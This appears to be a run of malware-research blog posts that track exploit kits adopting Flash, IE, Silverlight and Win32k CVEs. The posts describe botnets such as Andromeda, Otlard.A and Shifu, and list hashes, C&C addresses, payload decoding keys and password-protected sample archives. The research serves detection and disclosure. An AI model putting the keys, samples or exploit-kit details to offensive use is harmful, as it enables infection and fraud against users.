Yesterday's Nymaim spam campaign was also redirecting to Nuclear Pack.Without big surprise the sample ( 592899e0eb3c06fb9fda59d03e4b5b53 ) dropped by Nuclear is the same as the fake update proposed.But there was an additionnal 11kb payload call for which i could not find sample on driveNuclear Pack dropping Nymaim in the 2015-11-30 Spam CampaignIt was also unusually encoded with two XOR pass and first part of the decoded stream is a Shellcode.Friends (who don't want to be mentioned) figured a privilege escalation was in use there :According to Kaspersky and Timo Hirvonen (F-Secure) it's CVE-2014-4113 ( Win32k.sys Elevation of Privilege Vulnerability )I did not got to see the privilege escalation in live condition.Note: it's not the first time a public Exploit Kit is integrating an exploit to escalates right on dropped payload (Cf CVE-2015-2426 in Magnitude )Files : Fiddler and Dll here (password is malware - XOR key : 56774347426F664767  then  213404052d09212031)Thanks : Kaspersky,  Timo Hirvonen , Malc0de and 2 other friends for taking some time and use their wizardness  on this.Read More :An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) - 2014-10-29 - TrendMicro

Trash and Mailbox by Bethesda SoftworksOtlard.A (or let's say at least the malware triggering 2806902 || ETPRO TROJAN Win32.Otlard.A C&C Checkin response )  is a Spam BotnetI saw it loaded as a plugin in an instance of AndromedaThat Andromeda is being spread via :Bedep build id 6005 and here 6007 from an Angler EK fed by Malvertising :VirtualDonna group redirecting traffic to an Angler instance loading Bedep buildid 6007 in memoryBedep 6007 loading Andromeda 55ead0e4010c7c1a601511286f879e33 before update task.2015-09-28Note : Bedep 6007 was sometimes loading it with other payload-2015-09-16 for : ec5d314fc392765d065ff16f21722008 with Trapwot (FakeAV) e600985d6797dec2f7388e86ae3e82ba and Pony a4f08c845cc8e2beae0d157a3624b686-2015-09-29 for : 37898c10a350651add962831daa4fffa with Kovter ( 24143f110e7492c3d040b2ec0cdfa3d0 )That Andromeda beaconing to dnswow .com enslaved >10k bots in a week :Andromeda dnswow 2015-11-22Andromeda dnswow 2015-11-27Here the Otlard.A task in that Andromeda instance :Task installing Otlard.A as a plugin to Andromedaa Task in a Smokebot dropped by Nuclear Pack fed by Malvertising :Malvertising > Nuclear Pack > Smokebot > Stealer, Ramnit, Htbot and Andromeda > Otlard.A2015-11-28Smokebot : cde587187622d5f23e50b1f5b6c86969Andromeda : b75f4834770fe64da63e42b8c90c6fcd(out of topic Ramnit : 28ceafaef592986e4914bfa3f4c7f5c0 - It's being massively spread those days in many infection path. (Edit 2015-12-29 :  Htbot.B :  d0a14abe51a61c727420765f72de843a named ProxyBack by PaloAlto)Now here is what the control panel of that plugin looks like :Otlard.A panel :Otlard.A - JahooManager - Main - 2015-09-27Otlard.A - JahooManager - Servers - 2015-09-27Otlard.A - JahooManager - Settings - 2015-09-27Otlard.A - JahooManager - Campaigns - 2015-09-27Otlard.A - JahooManager - Bot - 2015-09-27that exe is : 2387fb927e6d9d6c027b4ba23d8c3073 and appears to be AndromedaOtlard.A - JahooSender - Tasks - 2015-09-27Otlard.A - JahooSender - Tasks - 2015-11-28Otlard.A - JahooSender - Tasks - Done Task - 2015-09-27Otlard.A - JahooSender - Domains - 2015-09-27Otlard.A - JahooSender - Domains - 2015-11-28Otlard.A - JahooSender - Messages - 2015-09-27Otlard.A - JahooSender - Messages - 2015-11-28Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28Otlard.A - JahooSender - Headers - 2015-11-28Otlard.A - JahooSender - Headers - Editing Header - 2015-11-28Otlard.A - JahooSender - Headers - Editing Header - 2015-11-28Otlard.A - JahooSender - Macross - 2015-11-28Otlard.A - JahooSender - Macross - 2015-11-28Otlard.A - JahooSender - Macross - Editing macross - 2015-11-28Otlard.A - JahooSender  - Macross - Editing macross - 2015-11-28Otlard.A - JahooSender - Macross - Editing macross - 2015-11-28Otlard.A - JahooSender - Attach - 2015-11-28Otlard.A - JahooSender - Attach - Attached image - 2015-11-28Otlard.A - JahooSender - Rules - 2015-11-28Otlard.A - JahooSender - Rules > Spam - 2015-11-28Olard.A - JahooSender - Rules > User - 2015-11-28Olard.A - Bases - Emails - 2015-11-28Olard.A - Bases - Blacklist - 2015-11-28Olard.A - Bases - Blacklist - Edit - 2015-11-28Olard.A - Botnet - Main - 2015-09-27Olard.A - Botnet - Main - 2015-11-28Otlard.A - Botnet - Modules - 2015-11-28Otlard.A - Botnet - Modules - Edit - 2015-11-28Otlard.A - Incubator - Accounts - 2015-11-28Otlard.A - Incubator - Settings - 2015-11-28Note : registrator menu has disappeared in last version. --Andromeda C&C 2015-11-28 :5.8.35.241202023 | 5.8.35.0/24 | LLHOST | EU | llhost-inc.com | LLHost IncSpam Module C&C 2015-11-28 :5.8.32.10 5.8.32.85.8.32.525.8.34.205.8.32.535.8.32.56202023 | 5.8.32.0/24 | LLHOST | EU | zanufact.com | LLHost IncThanks : Brett StoneGross for helping me with decoding/understanding the network communicationsFiles :All samples which hashes have been discussed here are in that zip.Jahoo - socker.dll : 7d14c9edfd71d2b76dd18e3681fec798( If you want to look into this, i can provide associated network traffic)Read More :Inside Andromeda Bot v2.06 Webpanel / AKA Gamarue - Botnet Control Panel 2012-07-02Inside Pony 1.7 / Fareit C&C - Botnet Control Panel - 2012-06-27Inside Smoke Bot - Botnet Control Panel - 2012-04-28Post publication Reading :ProxyBack Malware Turns User Systems Into Proxies Without Consent - 2015-12-23 - JeffWhite - PaloAlto

The CVE-2015-7645 has been fixed with Adobe Flash Player 19.0.0.226. Spotted in the wild (2015-10-13) in APT28's exploit kit by TrendMicro, this exploit was already reported 2 weeks before (2015-09-29) to Adobe by Natalie Silvanovich.I reported the Flash 0-day (CVE-2015-7645) two weeks before it was found in the wild https://t.co/nYeAWRG5jO— Natalie Silvanovich (@natashenka) 16 Octobre 2015 It has now made its way to Exploit KitAngler EK :2015-10-29CVE id confirmed by by Anton Ivanov ( Kaspersky )Angler EK successfully exploiting Flash 19.0.0.2072015-10-29Flash sample in that pass : 4af57fb1c71bb9c1599371d48240ff36Another sample : bea824974f958ac4efc58484a88a9c18One more from the Poweliks instance : 0d72221d41eff55dcfd0da50cd1c545eNot replayable fiddler sent to VTOut of topic sample loaded by bedep :5a60925ea3cc52c264b837e6f2ee915e Necursa9d5a9a997954f5421c94ac89d2656cd Vawtrak ( < that one was not expected in that infection path)2016-03-12Edge is now being served a landing and the flash being sent is targeting this CVE according to Kaspersky and EsetAngler EK exploiting Flash 18.0.0.209 on Windows 10 (build 10240) through EdgeFiddler : AnglerEK_Edge_18.0.0.209_2016-03-11.zipNuclear Pack:2015-10-30Nuclear Pack which has been playing with landing URI pattern lately has integrated itCVE-2015-7645 in Nuclear Pack on 2015-10-30Sample in that pass : f5dd2623ae871d58483bf14ec5d635e4Out of topic payload : 0b3de2a8d838883e10a1d824d20fe95c Kelihos Loader (harsh02)Fiddler sent to VTMagnitude:2015-11-10Magnitude trying to exploit CVE-2015-76452015-11-10Spotted sample : 21993dd3b943d935a9296aeff831cbb9 CVE id confirmed by Timo HirvonenNo payload but the actor behind that thread would like to see you Cryptowalled. Update might come.Spartan :2015-11-12Without surprise as Spartan is the work of the coder of Nuclear Pack.Note : old version of Chrome <= 43.0.257 and Firefox < 38 seems to be falling as wellSpartan pushing Pony and Alphacrypt via CVE-2015-76452015-11-12Sample in that pass : 1c074c862d3e25ec9674e6bd62965ad8  (another one: 66f34cd7ef06a78df552d18c729ae53c )(out of topic payload : Pony: 29c940f9d0805771e9c7ec8a5939fa25 (45.63.71.12 /myadvert/autoget.php) and Cryptowall 74ebff4acc4ad9c2a2e665ff293c02e6  NB earlier today drops were Pony and Alphacrypt ) Fiddler sent to VTNeutrino:Most probably appeared 2015-10-16Necurs being dropped by Neutrino via CVE-2015-76452015-11-17Sample in that pass: 7dd9813ef635e98dd9585deaefecfcff(Out of topic payload : Necurs a83a96e87e80adef1e4598a645f2918c )Fiddler sent to VT  (You might want to read the detailed analysis by Trustave)Read More :Adobe Flash: Type Confusion in IExternalizable.writeExternal When Performing Local Serialization - 2015-09-29 - Natalie SilvanovichNew Adobe Flash Zero-Day Used in Pawn Storm Campaign Targeting Foreign Affairs Ministries - 2015-10-13 - Feike Hacquebord - Brooks Li - Peter Pi - TrendMicroLatest Flash Exploit Used in Pawn Storm Circumvents Mitigation Techniques - 2015-10-16 - Peter Pi - TrendMicroPost Publication Reading :Neutrino Exploit Kit – One Flash File to Rule Them All - 2015-12-28 - Daniel Chechik and Anat Davidi - Spiderlabs/Trustwave

In the post on the UK focused Shifu I illustrated malvertising traffic to Angler.The traffer group behind this activity is the same exposed by BelchSpeak from Invincea in many tweets (explaining the addition of code to spot Invincea Sandbox)  FoxIT in june,  Malwarebytes in September,  or Trendmicro 2 weeks ago.As it's easier to have a name to share/talk  about stuff i'll use "VirtualDonna Traffers" to refer to them (virtualdonna .com is one of the domains they used that got some attention)Earlier this year they were using https bit.ly,2015-07-11 - bit.ly as https url shortenertiny url2015-07-11 - tiny url as https url shorteneror goo.gl url shortener2015-06-12 - goo.gl as https url shorterner and switched to their own https redirector behind cloudflare around the middle of September ( naotsandhap.euTwo pass here : same source (Dailymotion), same country (Australia), same Traffer for same customer (how/why? same payload : Reactorbot  srvdexpress3 .com)Different Legit part of the chain2015-09-29then 2 weeks ago mediacpm.com and wrontoldretter.eu )https gives the traffer the ability to kill the referer chain (making it more difficult to figure out where the Exploit Kit landing spotted in the traffic is coming from).Once discovered a way to Sig this is to flag the ssl certificate being used.Those days they are using a DoubleClick https open redirect.VirtualDonna Traffers exploiting an https open redirect by Doubleclick in its chain to Angler EKGB - 2015-10-15Out of topic Payload in that pass : Shifu - 695d6fbd8ab789979a97fb886101c576 beaconing to nyctradersacademy .comDoubleclick has been informed about the issue.Post Publication Readings :The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK - 2015-12-15 - ProofpointLet’s Encrypt Now Being Abused By Malvertisers - 2016-01-06 - TrendMicro

I noticed since several days a shift in malware distribution in the UK.Many infection path that I follow are now dropping a banker that i already saw many times, especially at the end of 2014 and mostly in Italy.First time I encountered that threat : 2014-10-08Angler EK dropping 165146e43ccee9c29b62693caf290df7 in an IT focused infection path2014-10-08At that time I learnt from Frank Ruiz ( FoxIT ) that he spotted it 1 month earlier (2014-09-03 exactly). We were using a "non public" name to talk about it.So two days ago in UK traffic :2015-09-22 - An Angler EK dropping  0598ee3e06c681d7f9e05d83bb7ea422 via malvertising on GBR trafficI saw that banking trojan again. (note : contacted,  Frank Ruiz told me that this banker activity never really stopped). What was new to me is that it was installing Apache,Apache folder installed by 0598ee3e06c681d7f9e05d83bb7ea422 2015-09-22Apache ConfigData folder of the Apache installationCustomers of 4 financial institutions are targeted by the injects stored in the config.xmlconfig.xmlThe same day i saw it again, other malvertising campaign (read: other actor bringing the traffic) and not dropped directly but as a 2nd Stage in a bedep thread which was not grabbing an adfraud module:Angler EK pushing bedep grabbing 791491ba9f0a7670659f45f1e5421c83 2015-09-22Seeing it again today in malvertising campaign focused on UK, I decided to write about that and contacted Brett StoneGross (Dell SecureWorks) to try and get the 'defense name' for this. He told me that what I was describing was probably Shifu ..and fast confirmed it looking at the sample. (Edit reaction to twitter : He also told me that Shifu is based on Shiz)So here we are: Shifu <3 GBRShifu <3 GBR2015-09-24Side note : Here are some of the DGA in case main domain stop working.Files : ShifuPackage_2015-09-24.zip Password : malwareContains : 4 fiddler, 1 pcap, 6 samples and 2 apache config folder (with injects).Thanks: Frank Ruiz (Foxit) and Brett StoneGross (Dell SecureWorks) for their inputs/insight/awesomeness.Read More:Shifu: ‘Masterful’ New Banking Trojan Is Attacking 14 Japanese Banks - 2015-08-31 - Limor Kessem - IBM X-ForceJapanese Banking Trojan Shifu Combines Malware Tools - 2015-09-24 - Diwakar Dinkar - McAfeePost publication Reading:3,000 High-Profile Japanese Sites Hit By Massive Malvertising Campaign  2015-09-30 - Trenmicro

Patched with flash version 18.0.0.232, CVE-2015-5560 is now being exploited by Angler EK.Angler EK :2015-08-29[Edit : 2015-09-01] Exploit candidated by by Anton Ivanov ( Kaspersky ) as CVE-2015-5560 [/edit]The exploit has been added the 28th. It's not being sent to Flash 18.0.0.232..It uses the same Diffie-Hellman Key Exchange technique described by FireEye as in their CVE-2015-2419 implementation making a default fiddler unreplayable.Angler EK pushing Bedep to Win7 IE11 Flash 18.0.0.209 - CVE-2015-55602015-08-29Sample in that pass : 9fbb043f63bb965a48582aa522cb1fd0Fiddler sent to VT (password is malware)Note: with help from G Data, a replayable fiddler is available. No public share (you know how to get it).Nuclear Pack :2015-09-10Additional post spotted on the 2015-09-10Nuclear Pack additionnal post on 2015-09-10 showing integration of CVE-2015-5560 was on the roadand got a first payload  the day after :Nuclear Pack successfully exploiting Flash 18.0.0.209 with CVE-2015-5560 (rip from Angler)2015-09-11( Out of topic payload : 91b76aaf6f7b93c667f685a86a7d68de  Smokebot C&C  hostnamessimply1.effers .com: )Files : Fiddler here (Password is malware)Read More :Adobe Flash: Overflow in ID3 Tag Parsing - 2015-06-12 Google Security ResearchThree bypasses and a fix for one of Flash's Vector.<*> mitigations - 2015-08-19 - Chris Evans - Google Project ZeroCVE-2015-2419 – Internet Explorer Double-Free in Angler EK  - 2015-08-10 - FireEyeBedep’s DGA: Trading Foreign Exchange for Malware Domains - 2015-04-21 - Dennis Schartz - Arbor SertPost publication reading :Attacking Diffie-Hellman protocol implementation in the Angler Exploit Kit - 2015-09-08 KasperskyAnalysis of Adobe Flash Player ID3 Tag Parsing Integer Overflow Vulnerability (CVE-2015-5560) - 2016-01-12 - Nahuel Riva - CoreSecurity

As published by FireEye Angler EK is now exploiting CVE-2015-2419 fixed with MS15-065Angler EK :2015-08-10It seems they might have started to work on that exploit as early as 2015-07-24 where some instances briefly used code to gather ScriptEngineVersion from redirected visitors :Angler EK gathering ScriptEngineVersion data the fast way.2015-07-24Today first pass i made was showing a new POST call and was successfully exploiting a VM that used to be safe to Angler.CVE-2015-2419 successfully exploiting IE11 in windows 72015-08-10(Here bedep grabbing Pony and TeslaCrypt then doing some AdFraud)I spent (too much 😉 ) time trying to decode that b value in the POST reply.Here are some materials :- The landing after first pass of decoding and with some comments : http://pastebin.com/JQuyAXarThe post call is handled by String['prototype']['jjd'] , ggg is sent to Post data as well as the ScriptEngineVersion (in the shared pass : 17728 )- The l() function handling the post : http://pastebin.com/hxZJwbaY- The post data and reply after first pass of decoding : http://pastebin.com/raw.php?i=NWkU7CXrFiles : 2 Fiddlers (ScriptEngineVersion Gathering and successfull pass - use malware as password)Thanks :Horgh_RCE for his helpMagnitude :2015-08-22( I am waiting for some strong confirmation on CVE-2015-2426 used as PrivEsc only here )Magnitude successfully exploiting CVE-2015-2419 to push an elevated (CVE-2015-2426) Cryptowall on IE11 in Win72015-08-22As you can see the CVE-2015-2419 is a RIP of Angler EK's implementation (even containing their XTea key, despite payload is in clear)Note : The CVE-2015-2426 seems to be used for privilege escalation onlyCryptowall dropped by Magnitude executed as NT Authority\system after CVE-2015-24262015-08-23and has been associated to flash Exploit as well.Pass showing the privilege escalation has been associated to flash Exploit as well.2015-08-23Files : CVE-2015-2419 pass (password: malware)CVE-2015-5122 pass featuring CVE-2015-2426 (password : malware)Thanks :Horgh_RCE , EKWatcher and Will Metcalf for their helpNuclear Pack:2015-08-23Nuclear Pack exploiting IE11 in Win7 with CVE-2015-2419 to push TeslaCrypt2015-08-23Files :  Fiddler (Password is malware)Neutrino :CVE Identification by Timo HirvonenNeutrino successfully exploiting CVE-2015-2419 on IE11 in Windows 72015-08-27(Out of topic payload : c7692ccd9e9984e23003bef3097f7746  Betabot)Files: Fiddler (Password is malware)RIG:2015-08-27RIG successfully exploiting CVE-2015-24192015-08-27(Out of topic payload : fe942226ea57054f1af01f2e78a2d306 Kelihos (kilo601)Files : Fiddler (password is malware)Hunter :2015-08-27@hunter_exploit 2015-08-26As spotted by Proofpoint Hunter EK has integrated CVE-2015-2419Hunter Exploit Kit successfully exploiting CVE-2015-24192015-08-27Files : Fiddler (password is malware)Kaixin :2016-01-08Files: Fiddler here (password is malware)( out of topic Payload : bb1fff88c3b86baa29176642dc5f278d firing PCRat/Gh0st ET rule 2016922 )Sundown :2016-07-06 - Thanks  Anton Ivanov (Kaspersky) for confirmationSundown successfully Exploiting CVE-2015-2419 - 2016-07-06cmd into wscript into Neutrino-ish named / RC4ed Payload let think this is a Rip from Neutrino implementation( Out of topic payload: bcb80b5925ead246729ca423b7dfb635 is a Netwire Rat )Files : Sundown_CVE-2015-2419_2016-07-06 (password is malware)Read More :Hunter Exploit Kit Targets Brazilian Banking Customers - 2015-08-27 - ProofpointCVE-2015-2419 – Internet Explorer Double-Free in Angler EK - 2015-08-10 - Sudeep Singh, Dan Caselden - FireEye2015-08-10 - ANGLER EK FROM 144.76.161.249 SENDS BEDEP This pass shared by Brad from Malware-Traffic-Analysis is including the CVE-2015-2419Generic bypass of next-gen intrusion / threat / breach detection systems - 2015-06-05 - Zoltan Balazs - EffitasPost publication Reading :Attacking Diffie-Hellman protocol implementation in the Angler Exploit Kit - 2015-09-08 Kaspersky

Patched with ms15-044 CVE-2015-1671 is described as TrueType Font Parsing Vulnerability.Silverlight up to 5.1.30514.0 are affected, but note : most browser will warn that the plugin is outdatedOut of date Plugin protection in Chrome 39.0.2171.71Out of date ActiveX controls blocking in Internet Explorer 11(introduced in August 2014)and also consider that Microsoft announced the end of Silverlight at beginning of the month.Angler EK :2015-07-21Around the 1st of July some new Silverlight focused code appeared in Angler EK landing.It even seems coders made some debug or something wrong as you could see this kind of popup several hours long on Angler EK.Deofuscated snipet of Silverlight call exposed to Victims in Angler EK2015-07-02I failed trying to get something else than a 0 size silverlight calls.I heard about filled calls from Eset and EKWatcher.The exploit sent was 3fff76bfe2084c454be64be7adff2b87  and appears to be a variation of CVE-2015-1671 (Silverlight 5 before 5.1.40416.00).  I spent hours trying to get a full exploit chain....No luck. Only 0size calls.But, it seems it's back today (or i get more lucky ? ) :--Disclaimer : many indicators are whispering it's the same variation of CVE-2015-1671, but I am still waiting for a strong confirmation--Silverlight 5.1.30514.0 exploited by Angler EK via CVE-2015-1671 in IE 11 on Windows 72015-07-21Silverlight 5.1_10411.0 exploited by Angler EK via CVE-2015-1671 in Chrome 39 on Windows 72015-07-21Silverlight 5.1.30514.0 exploited by Angler EK via CVE-2015-1671 in Firefox 38 on Windows 72015-07-21Two x86 - x64 dll are encoded in the payload stream with XTea Key : m0boo69biBjSmd3pSilverlight dll in DotPeek after Do4dotSample in those pass : ac05e093930662a2a2f4605f7afc52f2(Out of topic payload is bedep which then gather an adfraud module - you have the XTea key if you want to extract)Files: Fiddler (password is malware)[Edit : 2015-07-26, has been spread to all Angler Threads]Thanks for help/tips :Eset, Microsoft, Horgh_RCE,  Darien Huss, Will Metcalf, EKWatcher.Magnitude :2015-07-28  has been spotted by Will Metcalf in MagnitudeIt's a rip of Angler's oneSilverlight 5.1.30514.0 exploited by Magnitude2015-08-29Files: Fiddler (password is malware)Read more :CVE-2013-0074/3896 (Silverlight) integrates Exploit Kits - 2013-11-13